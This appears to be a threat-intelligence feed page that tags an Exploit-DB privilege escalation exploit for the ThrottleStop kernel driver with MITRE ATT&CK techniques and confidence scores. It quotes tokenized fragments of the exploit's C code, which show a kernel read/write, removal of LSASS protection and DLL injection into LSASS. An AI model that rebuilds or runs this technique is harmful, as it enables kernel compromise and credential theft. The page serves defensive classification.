TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Exploit-DB

[local] Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation

2026-04-22 · Read original ↗

ATT&CK techniques detected

12 predictions
T1068Exploitation for Privilege Escalation
99%
"[ local ] throttlestop kernel driver - kernel out - of - bounds write privilege escalation throttlestop kernel driver - kernel out - of - bounds write privilege escalation # exploit title : throttlestop kernel driver - kernel out - of - bounds write privilege escalation # exploit…"
T1003.001LSASS Memory
95%
"searchprocesspid = xread ( hdrv, ( uint64 _ t ) searcheprocess + 0x2e0 ) ; / / + 0x2e0 uniqueprocessid : ptr64 void if ( searchprocesspid = = lsasspid ) / / lsass process { break ; } } printf ( " [ + ] found lsass eprocess! \ n " ) ; printf ( " [ + ] removing ppl protection... \ …"
T1055.001Dynamic-link Library Injection
89%
"##el : uchar printf ( " [ + ] lsass protections disabled \ n " ) ; closehandle ( hdrv ) ; security _ package _ options spo = { } ; security _ status ss = addsecuritypackagea ( ( lpstr ) " c : \ \ windows \ \ system32 \ \ ntssp. dll ", & spo ) ; printf ( " [ + ] dll injection succ…"
T1055.001Dynamic-link Library Injection
81%
"##ror ( ) ) ; } else { printf ( " [ + ] service started correctly. \ n " ) ; } lpvoid nt _ base = getbaseaddr ( l " ntoskrnl. exe " ) ; printf ( " [ + ] nt base : % p \ n ", nt _ base ) ; handle hdrv = null ; hdrv = createfilea ( " \ \ \ \. \ \ throttlestop ", ( generic _ read | …"
T1543.003Windows Service
78%
"! ] error opening scm : % lu \ n ", getlasterror ( ) ) ; return 1 ; } / / create the service hservice = createservice ( hscmanager, l " throttlestop ", l " throttlestop ", service _ all _ access, service _ kernel _ driver, service _ auto _ start, service _ error _ normal, l " c :…"
T1569.002Service Execution
74%
"! ] error opening scm : % lu \ n ", getlasterror ( ) ) ; return 1 ; } / / create the service hservice = createservice ( hscmanager, l " throttlestop ", l " throttlestop ", service _ all _ access, service _ kernel _ driver, service _ auto _ start, service _ error _ normal, l " c :…"
T1055.001Dynamic-link Library Injection
66%
"searchprocesspid = xread ( hdrv, ( uint64 _ t ) searcheprocess + 0x2e0 ) ; / / + 0x2e0 uniqueprocessid : ptr64 void if ( searchprocesspid = = lsasspid ) / / lsass process { break ; } } printf ( " [ + ] found lsass eprocess! \ n " ) ; printf ( " [ + ] removing ppl protection... \ …"
T1057Process Discovery
54%
"0x % llx \ n ", ok, br, getlasterror ( ), ( unsigned long long ) out ) ; if ( ok & & br = = 8 & & out ) { ulonglong result = * ( volatile ulonglong * ) ( uintptr _ t ) out ; / / 8 bytes exactos } / / write printf ( " [ + ] write what : 0x % 016llx | where : 0x % 016llx \ n ", ( u…"
T1057Process Discovery
48%
"##rocess = ulonglong ( nt _ base ) + 0x5412e0 ; dword64 eprocess = xread ( hdrv, ( uint64 _ t ) system _ eprocess ) ; printf ( " [ + ] eprocess : 0x % llx \ n ", eprocess ) ; dword64 currentprocesspid = xread ( hdrv, ( uint64 _ t ) system _ eprocess + 0x2e0 ) ; / / + 0x2e0 unique…"
T1003.001LSASS Memory
48%
"sizeof ( processentry32w ) ; if ( process32firstw ( snapshot, & entry ) ) { do { if (! _ wcsicmp ( entry. szexefile, processname. c _ str ( ) ) ) { processid = entry. th32processid ; break ; } } while ( process32nextw ( snapshot, & entry ) ) ; } closehandle ( snapshot ) ; return …"
T1055.001Dynamic-link Library Injection
42%
"##rocess = ulonglong ( nt _ base ) + 0x5412e0 ; dword64 eprocess = xread ( hdrv, ( uint64 _ t ) system _ eprocess ) ; printf ( " [ + ] eprocess : 0x % llx \ n ", eprocess ) ; dword64 currentprocesspid = xread ( hdrv, ( uint64 _ t ) system _ eprocess + 0x2e0 ) ; / / + 0x2e0 unique…"
T1055.001Dynamic-link Library Injection
35%
"sizeof ( processentry32w ) ; if ( process32firstw ( snapshot, & entry ) ) { do { if (! _ wcsicmp ( entry. szexefile, processname. c _ str ( ) ) ) { processid = entry. th32processid ; break ; } } while ( process32nextw ( snapshot, & entry ) ) ; } closehandle ( snapshot ) ; return …"

Summary

Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation